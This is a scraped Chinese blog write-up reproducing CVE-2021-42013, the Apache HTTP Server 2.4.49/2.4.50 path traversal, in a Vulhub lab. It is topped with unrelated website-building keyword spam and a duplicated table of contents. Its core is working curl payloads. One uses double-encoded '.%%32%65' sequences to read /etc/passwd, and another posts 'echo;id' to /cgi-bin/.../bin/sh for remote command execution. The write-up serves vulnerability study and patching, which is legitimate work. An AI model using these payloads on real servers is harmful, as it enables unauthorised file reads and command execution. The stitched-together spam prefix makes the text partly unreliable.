响应式外贸建站,郑州网站建设维护,服饰类行业_如果要建设网站_说明其建站流程.,wordpress3D翻书效果感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证方式一 curl方式二 bp抓捕 1.5、修复建议 说明内容漏洞编号CVE-2021-42013漏洞名称… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证方式一 curl方式二 bp抓捕 1.5、修复建议 说明内容漏洞编号CVE-2021-42013漏洞名称Apache HTTP_2.4.50_路径穿越漏洞漏洞评级高危影响范围2.4.492.4.50漏洞描述CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件。修复方案升级至最新版本
1.1、漏洞描述
CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件
此漏洞影响Apache HTTP Server 2.4.49和2.4.50而不影响更早版本。
1.2、漏洞等级
高危
1.3、影响版本
Apache HTTP Server 2.4.49以及2.4.50两个版本
1.4、漏洞复现
1、基础环境
PathVulhub/httpd/CVE-2021-42013 启动测试环境
docker-compose build
sudo docker-compose up -d访问http://your-ip:8080/即可看到Apache HTTP Server的It works! 2、漏洞扫描 3、漏洞验证
Apache HTTP Server 2.4.50修补了以前的CVE-2021-41773漏洞
但可以使用.%%32%65进行绕过注意其中的/icons/必须是一个存在且可访问的目录
方式一 curl curl -v --path-as-is http://192.168.80.141:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd在服务器上启用mods cgi或cgid后此路径遍历漏洞将允许执行任意命令 curl -v --data echo;id http://192.168.80.141:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh方式二 bp抓捕 1.5、修复建议
升级至最新版本
